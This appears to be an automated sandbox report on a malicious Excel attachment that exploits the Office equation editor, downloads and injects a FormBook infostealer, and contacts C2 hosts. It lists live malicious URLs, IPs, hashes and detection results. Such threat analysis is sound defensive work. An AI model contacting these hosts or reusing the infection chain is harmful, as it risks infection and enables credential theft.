            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing (3) | Cached Domain Credentials | Remote System Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | File and Directory Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery (13) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

            Behavior Graph

            Behavior Graph ID: 552838 | Sample: RFQ_Order_PO_TAE5203E.xlsx | Startdate: 13/01/2022 | Architecture: WINDOWS | Score: 100
            Start-node signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 15 other signatures
            EXCEL.EXE 33 21 (started)
              dropped: C:\Users\...\~$RFQ_Order_PO_TAE5203E.xlsx, data
            EQNEDT32.EXE 12 (started)
              network: 209.141.37.110, 49167, 80 PONYNETUS United States
              dropped: C:\Users\user\AppData\Local\...\hnmy[1].exe, PE32
              dropped: C:\Users\Public\vbc.exe, PE32
              signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              vbc.exe 1 (started)
                dropped: C:\Users\user\AppData\Local\...\Cielert.tmp, PE32
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                vbc.exe (started)
                  signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe (injected)
                    network: www.aloebiotics.com 64.190.62.111, 49169, 80 NBS11696US United States
                    network: www.sjljtzsls.com 163.197.71.43, 49170, 80 CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHK South Africa
                    network: www.mediafyagency.com
                    signature: System process connects to network (likely due to code injection or exploit)
                    msiexec.exe (started)
                      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                      cmd.exe (started)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            RFQ_Order_PO_TAE5203E.xlsx | 36% | Virustotal |
            RFQ_Order_PO_TAE5203E.xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

            Dropped Files

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\Cielert.tmp | 100% | Avira | TR/Crypt.ZPACK.Gen
            C:\Users\Public\vbc.exe | 100% | Avira | TR/Crypt.XPACK.Gen3
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe | 100% | Avira | TR/Crypt.XPACK.Gen3
            C:\Users\user\AppData\Local\Temp\Cielert.tmp | 100% | Joe Sandbox ML |
            C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe | 31% | Metadefender |
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe | 60% | ReversingLabs | Win32.Trojan.Zusy
            C:\Users\user\AppData\Local\Temp\Cielert.tmp | 50% | Metadefender |
            C:\Users\user\AppData\Local\Temp\Cielert.tmp | 89% | ReversingLabs | Win32.Trojan.FormBook
            C:\Users\Public\vbc.exe | 31% | Metadefender |
            C:\Users\Public\vbc.exe | 60% | ReversingLabs | Win32.Trojan.Zusy

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            4.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
            4.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
            5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
            8.2.msiexec.exe.2b5796c.6.unpack | 100% | Avira | TR/Patched.Gen
            4.1.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            4.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
            4.1.vbc.exe.2130000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen3
            5.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
            http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
            http://209.141.37.110/hnmy.exe | 13% | Virustotal |
            http://209.141.37.110/hnmy.exe | 100% | Avira URL Cloud | malware
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
            http://treyresearch.net | 0% | URL Reputation | safe
            http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v | 100% | Avira URL Cloud | malware
            http://java.sun.com | 0% | URL Reputation | safe
            http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
            www.dreamschools.online/b80i/ | 100% | Avira URL Cloud | phishing
            http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v | 100% | Avira URL Cloud | malware
            http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
            http://www.%s.comPA | 0% | URL Reputation | safe
            http://sogou.9898top1.com/sscx.html | 0% | Avira URL Cloud | safe
            http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.aloebiotics.com | 64.190.62.111 | true | true | | unknown
            www.sjljtzsls.com | 163.197.71.43 | true | true | | unknown
            www.mediafyagency.com | unknown | unknown | true | | unknown

                  Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://209.141.37.110/hnmy.exe | true | Virustotal: 13%; Avira URL Cloud: malware | unknown
            http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v | true | Avira URL Cloud: malware | unknown
            www.dreamschools.online/b80i/ | true | Avira URL Cloud: phishing | low
            http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v | true | Avira URL Cloud: malware | unknown

                  URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | false | | high
            http://investor.msn.com | explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | false | | high
            http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | false | | high
            http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
            http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
            http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | false | | high
            http://treyresearch.net | explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
            https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_la | msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp | false | | high
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | false | | high
            http://www.piriform.com/ccleanerhttp://www.pir | explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp | false | | high
            http://java.sun.com | explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
            http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp | false | | high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp | false | | high
            http://investor.msn.com/ | explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | false | | high
            http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp | false | | high
            http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
            http://www.%s.comPA | explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
            http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | false | | high
            https://support.mozilla.org | explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | false | | high
            http://sogou.9898top1.com/sscx.html | msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                            Contacted IPs


                                            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            209.141.37.110 | unknown | United States | 53667 | PONYNETUS | true
            64.190.62.111 | www.aloebiotics.com | United States | 11696 | NBS11696US | true
            163.197.71.43 | www.sjljtzsls.com | South Africa | 140107 | CITISCLOUD-AS-APCITISCLOUDGROUPLIMITEDHK | true

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:552838
                                            Start date:13.01.2022
                                            Start time:20:07:37
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:RFQ_Order_PO_TAE5203E.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLSX@9/15@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 44.7% (good quality ratio 42%)
                                            • Quality average: 73.9%
                                            • Quality standard deviation: 30.1%
                                            HCA Information:
                                            • Successful, ratio: 83%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

            Time | Type | Description
            20:08:51 | API Interceptor | 77x Sleep call for process: EQNEDT32.EXE modified
            20:09:15 | API Interceptor | 35x Sleep call for process: vbc.exe modified
            20:09:31 | API Interceptor | 208x Sleep call for process: msiexec.exe modified
            20:10:20 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:downloaded
                                            Size (bytes):598016
                                            Entropy (8bit):7.276412737461471
                                            Encrypted:false
                                            SSDEEP:12288:KrsJGHL/Sw61UEVluVwMh8YelnvoCUiNG5VNQa5VQeiXMr0cZhMsr:CsJGHLbEVlu3elnwCR8xVPiXURr
                                            MD5:A21C93294EF3770C5C728A1B2D82FB92
                                            SHA1:239E6B8D02BA3501EFDC22AE5690DCE827F3AA6B
                                            SHA-256:1EC8F5C2A626D9484AF9532ED48A5B7482FC0DCDAB074D8545AC8E4454C68A89
                                            SHA-512:5621C1D39B752D5320CEE7BD265AB0C26C14791215F2A3D9F34BD870DC818DEB36DD0F46B443F95919B41544FC13C671F2C50B4C6602B15642DBF4C655C54748
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                            • Antivirus: ReversingLabs, Detection: 60%
                                            Reputation:low
                                            IE Cache URL:http://209.141.37.110/hnmy.exe
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\136D0B4A.jpeg
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                            Category:dropped
                                            Size (bytes):4396
                                            Entropy (8bit):7.884233298494423
                                            Encrypted:false
                                            SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                            MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                            SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                            SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                            SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C87F836.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):11303
                                            Entropy (8bit):7.909402464702408
                                            Encrypted:false
                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\215471E8.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):10202
                                            Entropy (8bit):7.870143202588524
                                            Encrypted:false
                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\765438C9.jpeg
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                            Category:dropped
                                            Size (bytes):4396
                                            Entropy (8bit):7.884233298494423
                                            Encrypted:false
                                            SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                            MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                            SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                            SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                            SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89430EC3.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                            Category:dropped
                                            Size (bytes):11303
                                            Entropy (8bit):7.909402464702408
                                            Encrypted:false
                                            SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                            MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                            SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                            SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                            SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emf
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                            Category:dropped
                                            Size (bytes):1628828
                                            Entropy (8bit):2.2291385285074514
                                            Encrypted:false
                                            SSDEEP:3072:YVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:YLjXlN0k1fKANpFZIiByA764
                                            MD5:731E0B08FA0E7DC5F3D10B43E2E3B5F7
                                            SHA1:5F7908B924DD863D52A9DBCB275616AA64BFD1BA
                                            SHA-256:8B1146C31A794D99510D3EC88648FA508C6E6274E62E3862A8DB7A1BFC2C111F
                                            SHA-512:CE36183E1CEB8EADDBAC1922FFADA487B9A08CF184CB07F0B83AB23DB137A120C1125A3F0583E12370C4B35525FE618FE756A50FBA16B0C167C7FF490FCD1E2E
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD131EBF.png
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):10202
                                            Entropy (8bit):7.870143202588524
                                            Encrypted:false
                                            SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                            MD5:66EF10508ED9AE9871D59F267FBE15AA
                                            SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                            SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                            SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\Cielert.tmp
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):167424
                                            Entropy (8bit):7.221469399680655
                                            Encrypted:false
                                            SSDEEP:3072:qJgt2lV8dYbBsWMIQayA8k/Mu74upkpOK4xj/wFIOnK6tap:VyrfMIVHd/Mg40kpOK4xj/wh
                                            MD5:295FBD9F8E4A4888B8FFECE30A34C962
                                            SHA1:37884E14B9075E00A40B071A64004670525C6676
                                            SHA-256:8916FF8C659E74F4A3523CDA054E5ED98209F84CB23F28C5857D670D5DC512E2
                                            SHA-512:AA2AEB7984FEF6642062A07D9981B88756DBA48F8116004B71EE65E920EA33C1A38230541ADD293CBC5E5A94B57157C1FE767E7F0924D1F4E46404AB78BBBE90
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Metadefender, Detection: 50%
                                            • Antivirus: ReversingLabs, Detection: 89%
                                            C:\Users\user\AppData\Local\Temp\~DF07CC82DF0855DA38.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\~DF2396DECF927A66A1.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\~DF90CE48132EA3580B.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:CDFV2 Encrypted
                                            Category:dropped
                                            Size (bytes):304184
                                            Entropy (8bit):7.976608927486528
                                            Encrypted:false
                                            SSDEEP:6144:VIBQ3UNUjY9p3U3jjEl4vzTJpxdaO53SXUjS2LIGI9DGv:VIB92eU3PElChxy2ZCw
                                            MD5:552F043A7C752EC7E8DDDBDF0B36C4D8
                                            SHA1:CFB4A5BEA12CAB9A47D3FF1EE1210D444B9A92A4
                                            SHA-256:E7A5F1C37A043773027F4937AFB63D3178362113132066C7435B6D716EDA6CF2
                                            SHA-512:2D5C9C4DC2F5A483CD572DB62F5339446391CD152F86F227F0C044D620C010B9433C1F6AA59133F799BD16F433AD9BC7035062384EA00A50F72D29BA74FC8273
                                            Malicious:false
                                            C:\Users\user\AppData\Local\Temp\~DFCD6368038830CEF2.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            C:\Users\user\Desktop\~$RFQ_Order_PO_TAE5203E.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            C:\Users\Public\vbc.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):598016
                                            Entropy (8bit):7.276412737461471
                                            Encrypted:false
